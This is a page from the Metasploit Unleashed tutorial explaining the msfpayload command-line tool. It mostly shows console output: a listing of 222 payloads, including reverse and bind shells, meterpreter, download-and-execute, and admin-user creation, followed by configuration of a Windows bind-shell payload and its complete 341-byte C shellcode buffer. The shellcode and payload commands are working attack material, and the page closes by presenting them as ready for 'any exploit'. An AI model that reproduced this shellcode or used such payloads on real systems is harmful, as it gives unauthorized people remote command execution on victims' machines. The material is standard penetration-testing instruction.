Msfpayload
From Metasploit Unleashed - Mastering The Framework
msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.
This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner.
root@bt:~# msfpayload -h Usage: /pentest/exploits/framework3/msfpayload [] [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar> OPTIONS: -h Help banner -l List available payloads
How powerful this tool can be is fully seen when showing the vast number of different types of shellcode that are available to be customized for your specific exploit:
root@bt:~# msfpayload -l Framework Payloads (222 total) ============================== Name Description ---- ----------- aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell aix/ppc/shell_find_port Spawn a shell on an established connection aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs) aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell bsd/x86/exec Execute an arbitrary command bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell bsd/x86/shell_find_port Spawn a shell on an established connection bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell bsdi/x86/shell_find_port Spawn a shell on an established connection bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent) cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/unix/generic Executes the supplied command cmd/unix/interact Interacts with a shell on an established socket connection cmd/unix/reverse Creates an interactive shell through two inbound connections cmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature. cmd/unix/reverse_netcat Creates an interactive shell via netcat cmd/unix/reverse_perl Creates an interactive shell via perl cmd/unix/reverse_ruby Connect back and create a command shell via Ruby cmd/windows/adduser Create a new user and add them to local administration group cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent) cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it cmd/windows/reverse_perl Creates an interactive shell via perl cmd/windows/reverse_ruby Connect back and create a command shell via Ruby generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell generic/shell_reverse_tcp Connect back to attacker and spawn a command shell generic/tight_loop Generate a tight loop in the target process java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java java/shell/bind_tcp Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else) java/shell/reverse_tcp Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else) linux/armle/adduser Create a new user with UID 0 linux/armle/exec Execute an arbitrary command linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc/shell_find_port Spawn a shell on an established connection linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc64/shell_find_port Spawn a shell on an established connection linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x64/exec Execute an arbitrary command linux/x64/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x64/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/adduser Create a new user with UID 0 linux/x86/chmod Runs chmod on specified file with specified mode linux/x86/exec Execute an arbitrary command linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged) linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell netware/shell/reverse_tcp Connect back to the attacker, Connect to the NetWare console (staged) osx/armle/execute/bind_tcp Listen for a connection, Spawn a command shell (staged) osx/armle/execute/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) osx/armle/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) osx/armle/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller. osx/ppc/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) osx/ppc/shell/find_tag Use an established connection, Spawn a command shell (staged) osx/ppc/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/x86/bundleinject/bind_tcp Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process osx/x86/bundleinject/reverse_tcp Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process osx/x86/exec Execute an arbitrary command osx/x86/isight/bind_tcp Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged) osx/x86/isight/reverse_tcp Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged) osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell osx/x86/shell_find_port Spawn a shell on an established connection osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/x86/vforkshell/bind_tcp Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged) osx/x86/vforkshell/reverse_tcp Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged) osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell php/bind_perl Listen for a connection and spawn a command shell via perl (persistent) php/bind_php Listen for a connection and spawn a command shell via php php/download_exec Download an EXE from an HTTP URL and execute it php/exec Execute a single system command php/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in PHP php/meterpreter/reverse_tcp Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP) php/reverse_perl Creates an interactive shell via perl php/reverse_php Reverse PHP connect back shell with checks for disabled functions php/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes. solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell solaris/sparc/shell_find_port Spawn a shell on an established connection solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell solaris/x86/shell_find_port Spawn a shell on an established connection solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell tty/unix/interact Interacts with a TTY on an established socket connection windows/adduser Create a new user and add them to local administration group windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a Dll via a reflective loader windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a Dll via a reflective loader windows/dllinject/bind_tcp Listen for a connection, Inject a Dll via a reflective loader windows/dllinject/find_tag Use an established connection, Inject a Dll via a reflective loader windows/dllinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a Dll via a reflective loader windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a Dll via a reflective loader windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a Dll via a reflective loader windows/dllinject/reverse_tcp Connect back to the attacker, Inject a Dll via a reflective loader windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a Dll via a reflective loader windows/download_exec Download an EXE from an HTTP URL and execute it windows/exec Execute an arbitrary command windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/find_tag Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_http Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process windows/patchupdllinject/find_tag Use an established connection, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/find_tag Use an established connection, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged) windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged) windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged) windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged) windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged) windows/shell/find_tag Use an established connection, Spawn a piped command shell (staged) windows/shell/reverse_http Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged) windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged) windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged) windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged) windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged) windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged) windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged) windows/shell_bind_tcp Listen for a connection and spawn a command shell windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell windows/shell_reverse_tcp Connect back to attacker and spawn a command shell windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged) windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged) windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged) windows/upexec/find_tag Use an established connection, Uploads an executable and runs it (staged) windows/upexec/reverse_http Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged) windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged) windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged) windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged) windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged) windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged) windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged) windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/find_tag Use an established connection, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged) windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged) windows/x64/exec Execute an arbitrary command (Windows x64) windows/x64/meterpreter/bind_tcp Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged) windows/x64/meterpreter/reverse_tcp Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged) windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged) windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged) windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64) windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64) windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged) windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating. In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload.
root@bt:~# msfpayload windows/shell_bind_tcp O Name: Windows Command Shell, Bind TCP Inline Module: payload/windows/shell_bind_tcp Version: 8642 Platform: Windows Arch: x86 Needs Admin: No Total size: 341 Rank: Normal Provided by: vlad902sf Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Description: Listen for a connection and spawn a command shell
As we can see from the output, we can configure three different options with this specific payload, if they are required, if they come with any default settings, and a short description:
- EXITFUNC
- Required
- Default setting: process
- LPORT
- Required
- Default setting: 4444
- RHOST
- Not required
- No default setting
Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O Name: Windows Command Shell, Bind TCP Inline Module: payload/windows/shell_bind_tcp Version: 8642 Platform: Windows Arch: x86 Needs Admin: No Total size: 341 Rank: Normal Provided by: vlad902sf Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique: seh, thread, process, none LPORT 1234 yes The listen port RHOST no The target address Description: Listen for a connection and spawn a command shell
Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=, * AutoRunScript= */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Now we have our fully customized shellcode to be used in any exploit!